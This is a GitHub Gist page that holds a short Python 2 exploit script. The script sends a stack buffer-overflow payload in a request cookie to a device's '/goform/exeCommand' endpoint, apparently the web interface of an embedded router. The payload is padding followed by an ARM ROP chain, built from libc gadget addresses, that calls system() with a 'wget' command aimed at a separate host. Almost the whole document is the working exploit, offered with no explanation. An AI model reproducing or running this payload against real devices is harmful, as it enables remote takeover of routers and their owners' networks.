Created
September 10, 2022 00:53
-
-
Save OlivierLaflamme/e0cfb80f5a6ff1dd459a8deaa15c9519 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| url = "http://%s:80/goform/exeCommand"%(host) | |
| libc=0x409a7000 | |
| godget1=0x00018298 #pop r3 pc | |
| godget1 = struct.pack("< I",godget1+libc) | |
| system=0x0005A270 | |
| system = struct.pack("< I", system+libc) | |
| command="wget 192.168.174.136" | |
| godget2 = 0x00040cb8 # mov r0 sp; blx r3 | |
| godget2 = struct.pack("< I", godget2 + libc) | |
| password = "A" * 444+".gif"+godget1+system+godget2+command | |
| req = urllib2.Request(url) | |
| req.add_header("Cookie", "password=%s" % password) | |
| try: | |
| resp = urllib2.urlopen(req) | |
| except: | |
| pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment